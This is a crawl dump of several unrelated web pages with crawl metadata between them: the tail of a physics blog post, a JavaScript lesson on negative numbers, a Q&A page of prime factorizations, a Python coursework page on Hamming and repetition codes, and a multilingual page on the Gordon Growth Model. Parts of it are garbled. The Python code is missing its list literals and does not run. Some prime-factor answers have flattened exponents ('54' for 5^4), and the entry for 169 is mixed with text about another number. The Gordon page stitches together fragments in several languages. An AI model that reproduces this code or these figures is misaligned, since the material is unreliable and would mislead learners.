case. Cosh is just a little higher and a little less steep...so it matches the sine wave at a slightly different position. Actually...the only way to match it up is to make the sine wave just a little bit longer. Instead of a half-length of 22 angstroms, the sine wave stretches to around 22.04....close to 0.2%, if you like. Similarly, in the anti-symmetric solution, the sine wave has to be shortened by the same amount. So the anti-symmetric solution has a slightly higher frequency than the symmetric solution.\n\nWe'll see what the implications of this are when we come back.\n\nOh...how did I calculate the 0.04 angstroms? 
That's the beauty of this method...it's pure geometry, just looking at the ratio of the function to its derivative on both sides of the boundary, and using the small-angle approximation tan(x) = x. It falls right out." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94494665,"math_prob":0.8746714,"size":4513,"snap":"2021-31-2021-39","text_gpt3_token_len":1036,"char_repetition_ratio":0.1060102,"word_repetition_ratio":0.0025477707,"special_character_ratio":0.2326612,"punctuation_ratio":0.12968917,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9714342,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-29T22:49:24Z\",\"WARC-Record-ID\":\"<urn:uuid:ef550522-1f4e-4d95-8ef6-159d0be09e3c>\",\"Content-Length\":\"70013\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3b8e7353-f075-42f4-a277-fff9f3644b83>\",\"WARC-Concurrent-To\":\"<urn:uuid:6c32d3df-0f4c-48d2-afdd-7ff0d271a51d>\",\"WARC-IP-Address\":\"172.217.2.97\",\"WARC-Target-URI\":\"https://marty-green.blogspot.com/2015/\",\"WARC-Payload-Digest\":\"sha1:IYLUOWS5QJ3UURZYESWCXXRYS7EMQXO7\",\"WARC-Block-Digest\":\"sha1:PIDZ7C2VGNA2CZIRVKH4UMBNPRRMADNE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153897.89_warc_CC-MAIN-20210729203133-20210729233133-00474.warc.gz\"}"}
https://code.mu/en/javascript/book/prime/basis/negative-numbers/
[ "", null, "# Negative numbers in JavaScript\n\nNumbers can be negative. To do this, put a minus sign before the number:\n\n```let a = -1; alert(a); // shows -1```\n\nA minus sign can be written to both numbers and variables:\n\n```let a = 1; let b = -a; // the contents of a with the opposite sign is written to b alert(b); // shows -1```\n\nИли вот так:\n\n```let a = 1; alert(-a); // shows -1```\n\nCreate the variable `a` with the value `-100`. Display this value on the screen.\n\nCreate the variable `a`, write some positive or negative number to it. Display this value with the opposite sign on the screen.\n\n## Plus sign before variables\n\nJust as negative numbers are preceded by the \"minus\" sign, positive numbers can be preceded by the \"plus\" sign.\n\nIn fact, this plus does nothing, but it is quite valid, see an example:\n\n```let a = +1; alert(a); // shows 1```" ]
[ null, "https://code.mu/en/javascript/book/prime/basis/negative-numbers/", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.80263615,"math_prob":0.9948423,"size":764,"snap":"2022-40-2023-06","text_gpt3_token_len":206,"char_repetition_ratio":0.13815789,"word_repetition_ratio":0.0,"special_character_ratio":0.28795812,"punctuation_ratio":0.147929,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9857652,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-26T19:08:31Z\",\"WARC-Record-ID\":\"<urn:uuid:b7ae51af-c500-495f-8cc1-7b0fbc18e23e>\",\"Content-Length\":\"4399\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:dea94b45-7e20-4ee2-ab15-048b3ea0bac7>\",\"WARC-Concurrent-To\":\"<urn:uuid:0d4b7694-940e-4f57-bc68-e70b4588b7d1>\",\"WARC-IP-Address\":\"93.125.99.98\",\"WARC-Target-URI\":\"https://code.mu/en/javascript/book/prime/basis/negative-numbers/\",\"WARC-Payload-Digest\":\"sha1:XJQBWRLTHW5N47L2OXXBYACB47YTGUOX\",\"WARC-Block-Digest\":\"sha1:6BQS7XPLE6BJ6YADVRKPGNO4DUGRCMBW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030334915.59_warc_CC-MAIN-20220926175816-20220926205816-00072.warc.gz\"}"}
https://oysterstreetpottery.com/qa/quick-answer-what-are-the-prime-factors-of-490.html
[ "", null, "# Quick Answer: What Are The Prime Factors Of 490?\n\n## What are the prime factors of 120?\n\nFactors of 120: 1, 2, 3, 4, 5, 6, 8, 10, 12, 15, 20, 24, 30, 40, 60, 120.\n\nPrime factorization: 120 = 2 x 2 x 2 x 3 x 5, which can also be written 120 = 2³ x 3 x 5..\n\n## What is the prime factor of 625?\n\nThe prime factorization of 625 is 5 x 5 x 5 x 5 = 54. To solve this, we use a factor tree.\n\n## What are the prime factors of 27?\n\n27 is a composite number. 27 = 1 x 27, or 3 x 9. Factors of 27: 1, 3, 9, 27. Prime factorization: 27 = 3 x 3 x 3, which can also be written 27 = 3³.\n\n## What is the prime factorization of 44?\n\n44 is a composite number. 44 = 1 x 44, 2 x 22, or 4 x 11. Factors of 44: 1, 2, 4, 11, 22, 44. Prime factorization: 44 = 2 x 2 x 11, which can also be written 2² x 11.\n\n## What is the prime factor of 700?\n\nThe prime factorization of 700 is 5 x 2 x 2 x 5 x 7.\n\n## What are the prime factors of 588?\n\n588 is a composite number.Prime factorization: 588 = 2 x 2 x 3 x 7 x 7, which can be written 588 = (2^2) x 3 x (7^2)The exponents in the prime factorization are 2, 1 and 2. … Factors of 588: 1, 2, 3, 4, 6, 7, 12, 14, 21, 28, 42, 49, 84, 98, 147, 196, 294, 588.More items…•\n\n## What are the prime factors of 200?\n\nThe prime factorization of 200 is as follows: 200 = 2 × 2 × 2 × 5 × 5.\n\n## What are the prime factors of 40?\n\nThe prime factorization of 40 is 2 × 2 × 2 × 5, or 23 × 5.\n\n## What is the factor of 10?\n\nThe factors of 10 are 1, 2, 5, and 10. You can also look at this the other way around: if you can multiply two whole numbers to create a third number, those two numbers are factors of the third. 2 x 5 = 10, so 2 and 5 are factors of 10. 1 x 10 = 10, so 1 and 10 are also factors of 10.\n\n## What are the prime factors of 384?\n\n384 and Level 6384 is a composite number.Prime factorization: 384 = 2 x 2 x 2 x 2 x 2 x 2 x 2 x 3, which can be written 384 = (2^7) x 3.The exponents in the prime factorization are 7 and 1. … Factors of 384: 1, 2, 3, 4, 6, 8, 12, 16, 24, 32, 48, 64, 96, 128, 192, 384.More items…•\n\n## What are the prime factors of 30?\n\nFactors of 30: 1, 2, 3, 5, 6, 10, 15, 30. Prime factorization: 30 = 2 x 3 x 5.\n\n## What are the prime factors of 72?\n\nSo, the prime factorisation of 72 are 2 × 2 × 2 × 3 × 3 or 23 × 32, where 2 and 3 are the prime numbers.\n\n## What is the sum of all positive prime factors of 2020?\n\nAnswer Expert Verified. The sum of its prime factors is 110.\n\n## What is the prime factorization of 490?\n\nThe prime factorization of 490 = 2•5•72.\n\n## What are the prime factors of 420?\n\n420 Factor Trees420 is a composite number.Prime factorization: 420 = 2 x 2 x 3 x 5 x 7, which can be written 420 = (2^2) x 3 x 5 x 7.The exponents in the prime factorization are 2, 1, 1, and 1. … Factors of 420: 1, 2, 3, 4, 5, 6, 7, 10, 12, 14, 15, 20, 21, 28, 30, 35, 42, 60, 70, 84, 105, 140, 210, 420.More items…•\n\n## What are the prime factors of 168?\n\nAgain, all the prime numbers you used to divide above are the Prime Factors of 168. Thus, the Prime Factors of 168 are: 2, 2, 2, 3, 7.\n\n## What are the prime factors of 70?\n\nSo, the prime factors of 70 are written as 2 x 5 x 7, where 2, 5 and 7 are the prime numbers. It is possible to find the exact number of factors of a number 70 with the help of prime factorisation. The prime factor of the 70 is 2 x 5 x 7.\n\n## What are the prime factors of 28?\n\n2 Answers. 
The prime factorization of 28 is 2²⋅7 .

## What are the prime factors of 450?

The prime factorization of 450 is 2 × 3 × 3 × 5 × 5. Written with exponents, the answer is 2 × 3² × 5².

## What are the prime factors of 1050?

1050 Factor Trees Are In Bloom This Spring
1050 is a composite number.Prime factorization: 1050 = 2 × 3 × 5 × 5 × 7, which can be written 1050 = 2 × 3 × 5² × 7.The exponents in the prime factorization are 1, 1, 2, and 1.More items…•

## What is the factors of 169?

507 and Level 6. 2015-05-30 / Leave a comment. 507 cannot be evenly divided by 4 or 9, but to simplify its square root, I would still make a little cake: √507 = (√169)(√3) = 13√3. … 169 and Level 2. 2014-07-08 / Leave a comment. 169 is a composite number and a perfect square. Factor pairs: 169 = 1 x 169 or 13 x 13." ]
[ null, "https://mc.yandex.ru/watch/66666868", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9164327,"math_prob":0.998745,"size":4795,"snap":"2020-45-2020-50","text_gpt3_token_len":1765,"char_repetition_ratio":0.34460446,"word_repetition_ratio":0.22242817,"special_character_ratio":0.43274245,"punctuation_ratio":0.19025157,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9992586,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-31T12:48:53Z\",\"WARC-Record-ID\":\"<urn:uuid:a0ed75c3-0be8-4398-9698-6f6e3b05d275>\",\"Content-Length\":\"40438\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:84845416-3b89-4fb8-88c0-aa9360a7b105>\",\"WARC-Concurrent-To\":\"<urn:uuid:ad7693ae-fef5-4e8b-9935-6084b232c3a1>\",\"WARC-IP-Address\":\"87.236.16.235\",\"WARC-Target-URI\":\"https://oysterstreetpottery.com/qa/quick-answer-what-are-the-prime-factors-of-490.html\",\"WARC-Payload-Digest\":\"sha1:2HQ5LN76GBGLKOLL52AFO2GCR43FSLGP\",\"WARC-Block-Digest\":\"sha1:QTNNX6NCZWIQOAYJ7JLNVGDT3J62XTOO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107918164.98_warc_CC-MAIN-20201031121940-20201031151940-00425.warc.gz\"}"}
https://samrobbins.uk/portfolio/error-correcting-codes/
[ "# Error Correcting Codes\n\nImplementing a range of algorithms for error correcting codes\n\nFeb 15, 2019\n\n2 minutes\n\n## Built with\n\nIn this coursework I implemented a range of functions for different methods of error correcting codes\n\n## Hamming codes\n\n### Message\n\nThis function takes a vector and converted it to a message that can be used in a hamming code\n\ndef message(a):\nif not checkvalid(a):\nreturn []\nl = len(a)\nr = 2\nwhile (2 ** r - 2 * r - 1) < l:\nr += 1\nk = 2 ** r - r - 1\nlength = list(bin(l)[2:])\nlength = [int(x) for x in length]\nlength = * (r - len(length)) + length\nend = * (k - r - l)\nreturn length + a + end\n\n\n### Hamming Encoder\n\nThis acts as an encoder for hamming codes\n\ndef hammingEncoder(m):\nif not checkvalid(m):\nreturn []\nl = len(m)\nr = 2\n# Ensuring that the list is of the correct length\nwhile 2 ** r - r - 1 < l:\nr += 1\n# If not return an empty list\nif 2 ** r - r - 1 != l:\nreturn []\n# Turn the two lists into numpy arrays so they can be multiplied\nmessage = np.array(m)\nmatrix = np.array(hammingGeneratorMatrix(r))\n# Multiply the message by the hamming generator matrix mod 2 and turn it back to a python list\nreturn (message.dot(matrix) % 2).tolist()\n\n\n### Hamming decoder\n\nThis acts as a decoder for hamming codes\n\ndef hammingDecoder(v):\nif not checkvalid(v):\nreturn []\nr = math.log(len(v) + 1, 2)\n\nif not r.is_integer():\nreturn []\nr = int(r)\nmatrix = []\n# Create the parity check matrix\nfor i in range(1, 2 ** r):\nmatrix.append(decimalToVector(i, r))\n# Turn that matrix into a numpy data structure\nmatrix = np.matrix(matrix)\na = np.matrix(v)\n# Multiply the message by the parity check matrix mod 2\n# The line below this has errors when using test_up_to, errors on 2\nnumber = (a.dot(matrix) % 2).tolist()\n# Convert the list representing a number to the actual number\nnumber = int(\"\".join(str(x) for x in number), 2)\nif number==0:\nreturn v\n# Flip the bit in the message corresponding to number\nv[number - 1] = int(not v[number - 1])\nreturn v\n\n\n### Message from codeword\n\nThis recovers the message from the codeword of a Hamming code\n\ndef messageFromCodeword(c):\nif not checkvalid(c):\nreturn []\nr = 0\nl = len(c)\ncount = 0\n# Ensure the message is of length 2^r-r-1\nwhile 2 ** r - 1 < l:\nr += 1\n# If it is not of correct length, return an empty list\nif 2 ** r - 1 != l:\nreturn []\nfor i in range(0, r):\n# Removing indices corresponding to powers of 2\nc.pop(2 ** i - 1 - count)\ncount += 1\nreturn c\n\n\n## Repetition Codes\n\n### Repetition Encoder\n\nThis creates a repetition code\n\ndef repetitionEncoder(m, n):\nreturn m * n if m == or m == else []\n\n\n### Repetition Decoder\n\nThis recovers the message from a repetition code\n\ndef repetitionDecoder(v):\nreturn if v.count(0) > v.count(1) else if v.count(0) < v.count(1) else []" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.51879054,"math_prob":0.9910681,"size":2450,"snap":"2020-45-2020-50","text_gpt3_token_len":740,"char_repetition_ratio":0.14554374,"word_repetition_ratio":0.1,"special_character_ratio":0.33755103,"punctuation_ratio":0.0936255,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9994942,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-31T12:58:55Z\",\"WARC-Record-ID\":\"<urn:uuid:3ca7ce45-c8ac-474e-ad3c-79b5761bb012>\",\"Content-Length\":\"21591\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:90d26eb3-fc98-4ea0-9d28-e093e4dac5fd>\",\"WARC-Concurrent-To\":\"<urn:uuid:030063a6-1cfa-441e-980f-33a0da4acfd1>\",\"WARC-IP-Address\":\"76.76.21.21\",\"WARC-Target-URI\":\"https://samrobbins.uk/portfolio/error-correcting-codes/\",\"WARC-Payload-Digest\":\"sha1:UIMQBFJCVNX3GKYRXCOSBSP6DLS6IMUP\",\"WARC-Block-Digest\":\"sha1:GXTBSLXHNLLXR6QE26MZ7MJ7TAEBGXWK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107918164.98_warc_CC-MAIN-20201031121940-20201031151940-00517.warc.gz\"}"}
https://knihyzacal.com/terminal-value-gordon-growth-model-daah/too1334oqpx0
[ "Home\n\n# Gordon growth model\n\n### Gordon Growth Model - Guide, Formula, Examples and Mor\n\nThe Gordon Growth Model - also known as the Gordon Dividend Model or dividend discount model - is a stock valuation method that calculates a stock's intrinsic value, regardless of current market conditions. Investors can then compare companies against other industries using this simplified model What Is The Gordon Growth Model? First of all, the Gordon Growth Model is a tool to calculate the intrinsic value of a stock. And more specifically, the value of a dividend growth stock. Furthermore, you will hear this tool referred to as a constant perpetual growth model The Gordon Growth Model (GGM) is a method for the valuation of stocks. Investors use it to determine the relationship between value and return. The model uses the Net Present Value (NPV) of future dividends to calculate assets' intrinsic value. It's the most popular variation of the Dividend Discount Model (DDM). Myron J. Gordon (alongside other academicians) published the model in 1956. A strong influence was the work of John Burr Williams and his 1938 book on the theory of investment. Introduction to Gordon Growth Model The Gordon Growth Model is also called the dividend discount model is a kind of valuation of stock methodology where one uses it to calculate the intrinsic value of the stock and this model is very useful because it eliminates any externals factors like prevailing market conditions There is critical information that the Gordon model seeks to offer. Hence, the model has enjoyed widespread acceptance for predicting companies with a stable financial growth rate. The Gordon Growth Model helps to value the stock of a firm, and it does so via an assumption of a consistent rise in payments\n\n### Gordon Growth Model: Guide, Formula & 5 Examples\n\nWhat is the Gordon Growth Model? Gordon growth model is a type of dividend discount model in which not only the dividends are factored in and discounted but also a growth rate for the dividends is factored in and the stock price is calculated based on that Gordon Growth Model is based on the Dividend Discount Model (DDM) and was developed by Professor Myron J. Gordon of the University of Toronto in the late 1950s. Under the DDM, estimating the future dividends of a company could be a complex task since dividend payouts of companies may vary due to other factors such as market conditions, profitability, and so on. The GGM differs from the DDM in that it assumes a constant rate of growth of dividends The Gordon Growth Model (GGM) is a version of the dividend discount model (DDM). It is used to calculate the intrinsic value of a stock based on the net present value (NPV) of its future dividends. When Is the Gordon Growth Model Used? Investors use the Gordon Growth Model to determine the relationship between valuation and return La méthode de Gordon et Shapiro (en anglais, dividend discount model ou DDM) est un modèle d' actualisation du prix des actions. Il porte le nom de ses auteurs et a été mis au point en 1959. Ce modèle, dit aussi de « croissance perpétuelle », ne tient pas compte des plus values\n\nGordon Growth Model - Terminal Value. This consistent rate of growth is usually assumed to be very low and is known as the 'Terminal Growth Rate'. The growth rate must be between the GDP growth rate of the country and the inflation rate of the country. 
The growth rate must be higher than inflation and less than GDP because it is unreasonable to assume that into perpetuity (forever) that one. Das Gordon-Growth-Modell, auch bekannt als Dividendendiskontierungsmodell und Dividendenwachstumsmodell, ist eine Methode zur Berechnung des inneren Wertes (Intrinsic Value) einer Aktie, ohne Berücksichtigung der aktuellen Marktbedingungen.Das Modell setzt diesen Wert mit dem Barwert der zukünftigen Dividenden und dem Verkaufspreises der Aktie gleich - den zukünftigen Zahlungsströmen. What is the Gordon Growth Model? The Gordon Growth Model also bears the name of dividend discount model. It represents a way to calculate the intrinsic value of a stock not taking into account the current value of the stock in question. This model is based on several future dividends, which we assume should grow constantly Gordon Growth Model (2/3)Gordon Growth Model (2/3) • Consider a firm that is in a stable business, is expected to experience steady growth, is not expected to change its financial policies (in parti l fi i l l ) d th t t llticular, financial leverage), and that pays out all of its free cash flow as dividends to its equity holders. • We can price such a stock as the present value of its. This video is part of an online course, Financial Markets, created by Yale University. Learn finance principles to understand the real-world functioning of s..\n\n### Understanding The Gordon Growth Model For Stock Valuation\n\n1. Gordon growth model. The Gordon growth model (also called the constant growth model) is a special case of the dividend discount model which assumes a constant dividend growth rate. It is appropriate for the valuation of stock of companies who have achieved a mature growth rate and are insensitive to the business cycle. Under the Gordon growth model, the value of a stock equals expected cash dividend next year D 1 divided by the excess of the required rate of return (r) over the growth rate (g)\n2. The Gordon growth model (GGM) helps investors calculate the intrinsic value of a stock based upon future dividends that grow at a steady pace. It gets its name from Professor Myron Gordon of the..\n3. The term Gordon Growth Model refers to the method of stock valuation based on the present value of the stock's future dividends, irrespective of the current market conditions. The Gordon Growth Model is also referred to as the dividend discount model\n4. Gordon Growth Model Formula is used to find the intrinsic value of the company by discounting the future dividend payouts of the company. There are two formulas of Growth Growth Model #1 - Gordon Growth in Future Dividends #2 - Zero Growth in Future Dividend\n5. Get the template: http://www.smarthelping.com/2016/08/explaining-gordon-growth-model-for.html Explore all of smarthelping's financial models: http://www.smar..\n6. The Gordon Growth Model is known as the dividend discount model or DDM but without the current market stipulations, meaning the factors that influence the market, such as competitors, business challenges, etc. The point of this Gordon Growth model is to relate the current intrinsic value of stocks to the value of a stock's future dividends. This is a very old model but still actual and.\n\nThe Gordon Growth Model (GGM) is a method for the valuation of stocks. Investors use it to determine the relationship between value and return. The model uses the Net Present Value (NPV) of futur The equation most widely used is called the Gordon growth model (GGM). It is named after Myron J. 
Gordon of the University of Toronto, who originally published it along with Eli Shapiro in 1956 and made reference to it in 1959 Invented in the 1950s by Myron Gordon, the Gordon Growth Model is a financial equation used to determine the value of a stock. As a different take on the discounted cash flow model, the equation takes into account the dividend per share, rate of return, and dividend growth rate The Gordon Growth Model is especially useful for companies that have a great cash inflow and the company has stability with dependable leverage patterns. The valuation can be easily performed since the inputs of data for Gordon's Growth model are readily available for computation The Gordon Growth Model (GGM) is a popular model in finance and is commonly used to determine the value of a stock using future dividend payments. The model is named after Myron Gordon, an American economist, who popularized this model in the 1960s. In simple terms, the Gordon Growth Model calculates the present value of a future series of dividend payments. Here, the assumption is that future.\n\n### Gordon Growth Model Complete Guide to the Gordon Growth\n\n• GORDON GROWTH MODEL. A while back, specifically in the 1960s, Myron Gordon, an American economist, developed a model which can be used to estimate the constant growth of a stock of a certain company. This is a version of the DDM, but instead of showing the current value of a stock, this model is focused on showing the constant growth. At first, it seems complex, but this is one of the easiest.\n• The growth rate in earnings and dividends would have to be 3.12% a year to justify the stock price of $30.00. Illustration 2: To a financial service firm: J.P. Morgan A Rationale for using the Gordon Growth Model • As a financial service firm in an extremely competitive environment, it is unlikely that J.P. Morgan's earnings are going to gro • Also known as Gordon Dividend Model, the Gordon Growth Model assumes that a firm is expected to achieve a steady growth, will maintain a stable financial leverage, and will pay out its free cash flows to its shareholders in the form of dividends. This model assumes that the dividend per share grows at a constant rate in perpetuity and therefore, the present value of a firm is calculated based on this assumption The Gordon Growth Model, for example, is a subset of a larger group of models known as Dividend Discount Models. The model states that the value of a stock is the expected future sum of all of the dividends. If the predicted value is higher than the actual trading price, then the share is priced fairly Gordon Growth Model is a model to determine the fundamental value of stock based on a future series of dividends that grow at a constant rate The Gordon Growth Model is named after economist Myron J. Gordon of the University of Toronto, who originally published the model along with Eli Shapiro in 1956. Also known as the Dividend Discount Model, Gordon's model is used for valuing stocks that pay regular dividends that are expected to grow at a constant rate", null, "The Gordon Growth Model (GGM) is a tool used to value a firm. This theory assumes that the company is worth the sum of all future dividend payments discounted to the valued today (i.e.present value). It can also be called Dividend Discount Model The Gordon Growth Model assumes steady growth and steady discount rates but this isn't realistic. The economy ebbs and flows. Many investment trends are at play. 
And here's one big example, the average investor's required rate of return is much lower today than when interest rates peaked in the 1980s The Gordon growth model is a well known and widely known model for valuing equity securities. However, as with every model, there are some pros and cons that need to be understood before this model is applied. Understanding of these pros and cons will help differentiating between situations wherein it would be prudent to apply the Gordon growth model and situations wherein that would not be. Gordon Growth Model Check on Investopedia and LIT. Resume lesson #4 Under the Don't put all your eggs in one basket analogy, the eggs represent individual investments and the basket represents the overall investment portfolio. Spreading your eggs around allows you to: minimize the possibility that bad luck for a single investment adversely affects your overall portfolio. This is. The Gordon growth model is a simple discounted cash flow (DCF) model which can be used to value a stock, mutual fund, or even the entire stock market. The model is named after Myron Gordon who first published the model in 1959. The Gordon model assumes that a financial security pays a periodic dividend (D) which grows at a constant rate (g). These growing dividend payments are assumed to. Limitations of the Gordon Growth Model: 1) The main limitation of the Gordon growth model lies in its assumption of a constant growth in dividends per share. In reality, it is highly unlikely that companies will have their dividends increase at a constant rate. 2) The calculations are basically on future assumptions, which can be subjected to market changes based on the economic conditions and. The Gordon Growth model is an offshoot of the standard dividend discount model. This model is used primarily to calculate the intrinsic value of a firm based on the discounted value of future dividends 1 I. THE STABLE GROWTH DDM: GORDON GROWTH MODEL The Model : Value of Stock = DPS1/ ( r - g) where DPS1= Expected Dividends one year from now r = Required rate of return for equity investors g = Annual Growth rate in dividends forever A BASIC PREMISE • This infinite growth rate cannot exceed the growth rate for the overall economy (GNP) by more. The Gordon Growth Model works best to value the stock price of mature companies with low to moderate growth rates. It does not lend itself to accurate valuations for high-growth companies in the early stages of development. If a company does not pay a dividend, earnings per share can be substituted The Gordon Growth Model (GGM) is a popular model in finance and is commonly used to determine the value of a stock using future dividend payments. The model is named after Myron Gordon, an American economist, who popularized this model in the 1960s. In simple terms, the Gordon Growth Model calculates the present value of a future series of dividend payments. Here, the assumption is that future dividends will grow at a constant rate and will continue forever. Because of this assumption, this. What is Gordon Growth Model, This model is use to determine the fundamental value of stock, it determines the value of stock based on sequence or series of dividends that matured at a constant rate , and the dividend per share is payable in a year Stock Value (P) = D / (k - G)-----Equation 1 Where D= Expected dividend per share one year from now G= Growth rate in dividends k= required. Use the Gordon Growth Model and CAPM (5Y) to calculate the intrinsic value of the 3 stocks. 
Which case works and which case does not work? Explain why. You may need to use Factiva or Yahoo Finance. Gordon Growth Model. The Gordon Growth Model is a method used to calculate a stock's intrinsic value without reference to its current market value. The value depends on the present value of the future dividends the stock is expected to pay. The dividend is expected to grow at a certain rate based on past experience. The Gordon Growth model is used to derive a fair stock price based on current dividend payments and the anticipated growth rate. Defining The Gordon Growth Model The Gordon Growth Model was..
### Gordon Growth Model Formula, Example, Analysis The most common and straightforward calculation of a DDM is known as the Gordon growth model (GGM), which assumes a stable dividend growth rate and was named in the 1960s after American economist.. The Gordon Growth Model. Chapter One began with a discussion of investment principles in a perfect capital market characterised by certainty. According to Fisher's Separation Theorem (1930), it is irrelevant whether a company's future earnings are paid as a dividend to match shareholders' consumption preferences at particular points in time. If a company decides to retain profits for. The Gordon Growth Model is a simplified version of one of several models examined by MJ Gordon in his 1959 paper. It values a security using the discounted value of future dividends assuming a fixed growth rate: d/(r - g) Where d is the next dividend, r is the required rate of return, and, g is the rate of dividend growth. This is simply the usual DCF formula simplified for a fixed discount. Le terme «Gordon Growth Model» fait référence à la méthode d'évaluation des actions basée sur la valeur actuelle des dividendes futurs de l'action, quelles que soient les conditions de marché actuelles. Le modèle de croissance Gordon est également appelé modèle d'actualisation des dividendes. La formule s'applique uniquement aux actions versant des dividendes et la formule pour l. The justified P/B ratio is based on the Gordon Growth Model. It uses the sustainable growth relation and the observation that expected earnings per share equal book value times the return on equity. On this page, we provide the justified price-to-book formula, interpret the ratio, and implement a justified P/B multiple example in Excel. The spreadsheet is available at the bottom of the page. The Gordon Growth Model can now tell me what the FTSE 100 should be worth: P=D 1 /(r-g) P=191.81/(0.08-.03) (8% and 3% are expressed as decimals in the model) P=191.81/.05 P=3,836; Our. ### Gordon Growth Model Formula & Examples InvestingAnswer • Gordon growth model (Constant growth dividend discount model): assumes that dividends will grow indefinitely at a constant growth rate.The value of the stock is calculated as: Calculate the value of a stock that paid a$10 dividend last year, if dividends are expected to grow forever at 6% and the required rate of return on equity is 8%\n• Gordon (Constant) Growth Dividend Discount Model. As the name implies, the Gordon (constant) growth dividend discount model assumes dividends grow indefinitely at a constant rate. $$V_0=\\frac{D_1}{r-g}$$ Where: D 1 = expected dividends in year 1 . Note that this is of the utmost importance in your calculation\n• According to the Gordon Growth Model, the price of stocks depend on the following except OA the most recent dividend paid B. return on Treasure bili OC expected constant growth rate in dividends OD required retum on investments When your required retum on an equity investment increases then according to the Gordon Gown Model you will be willing to pay for investment Suppose that a stock is.\n• Gordon Growth Method Intuition. The basic intuition here is that we can pay: Annual Free Cash Flow / Discount Rate. For an investment, if the cash flow stays the same each year and we're targeting a specific yield on our investment (known as the discount rate in a DCF)\n• The Gordon growth model is a simple and convenient way of valuing stocks but it is extremely sensitive to the inputs for the growth rate. 
Used incorrectly, it can yield misleading or even absurd results, since, as the growth rate converges on the discount rate, the value goes to infinity. Consider a stock, with an expected dividend per share next period of $2.50, a cost of equity of 15%, and. • Constant-growth model — Also called the Gordon Shapiro model, an application of the dividend discount model which assumes (1) a fixed growth rate for future dividends and (2) a single discount rate. The New York Times Financial Glossary The Gordon Growth Model is a very old and very useful stock valuation model. It's based on the insight that the value of stock today is the present value of all future dividends the stock holder will receive. If one can argue the dividends will grow at a constant rate, then we can use the simple Gordon model: where P is the value of the stock today, D is the dividend in one year (normally), r. Definition: Dividend growth model is a valuation model, that calculates the fair value of stock, assuming that the dividends grow either at a stable rate in perpetuity or at a different rate during the period at hand. What Does Dividend Growth Model Mean? What is the definition of dividend growth model? The dividend growth model determines if a stock is. Some obvious candidates for the Gordon Growth Model. Regulated Companies, such as utilities, because . their growth rates are constrained by geography and population to be close to the growth rate in the economy in which they operate. they pay high dividends, largely again as a function of history they have stable leverage (usually high) Large financial service companies, because . their size. The dividend discount model (DDM) is a method of valuing a company based on the theory that a stock is worth the discounted sum of all of its future dividend payments. In other words, it is used to value stocks based on the net present value of the future dividends.The equation most widely used is called the Gordon growth model.It is named after Myron J. Gordon of the University of Toronto. Do not forget that Gordon's growth model and the use of the dividend-discount model as an all, is quite sensitive to the assumptions that you use, particularly in what refers to the growth rate and to the perceived cost of equity. For that reason, this model is more adequate for companies where foreseen growth is slow. Next Section: 3.2.3. Capital Asset Pricing Model (CAPM) Learning Center. What Is the Gordon Growth Model (GGM)? The Gordon Growth Model (GGM) is used to determine the intrinsic value o ### Méthode de Gordon et Shapiro — Wikipédi • Capitalization Rate - Gordon Growth Model. In financial theory, a perpetuity is a set of cash flows that will continue into infinity and the formula is identical to the formula defined above for the cap rate method. The valuation method treats the income received by the property as income that will continue forever; however, there would be some amount of expected growth. As an owner of an. • Gordon Growth Modelは、市場の状況の変化にかかわらず、株価を計算します。投資家はさまざまな業界の企業の評価を比較できるため、これは重要です。 仮定. ゴードン成長モデルは次のように仮定しています� • De term Gordon Growth Model verwijst naar de methode van aandelenwaardering op basis van de contante waarde van de toekomstige dividenden van het aandeel, ongeacht de huidige marktomstandigheden. Het Gordon-groeimodel wordt ook wel het dividendkortingsmodel genoemd. De formule is alleen van toepassing op dividenduitkerende aandelen en de formule voor de aandelenwaardering wordt berekend door. ### What Is The Gordon Growth Method? 
Wall Street Oasi The Gordon Growth Model in Practice. For example, if a company lists its stock price at$50, has a required rate of return at 15% (r), pays a dividend of $1 per share you own, and has a constant growth rate of 6% then how would you calculate the stock value?$1 ÷ (0.15 - 0.06) = \\$11.11 The model would not be practical if the growth rate is equal or more than the required rate of return. It. The Gordon growth model simply assumes that the dividends of a stock keep of increasing forever at a given constant rate. Let us understand this with the help of an example. Example: Let's say that an analyst wants to forecast the value of a given stock. He is using the dividend discount model to do so. He selects a 5 year horizon period for which he will project the most accurate possible. Gordon Growth Model: cours de bourse = (paiement du dividende dans la période suivante) / (coût des capitaux propres - taux de croissance du dividende) Les avantages du modèle de croissance Gordon sont qu'il est le modèle le plus couramment utilisé pour calculer le prix des actions et qu'il est donc le plus facile à comprendre. Il valorise le stock d'une entreprise sans 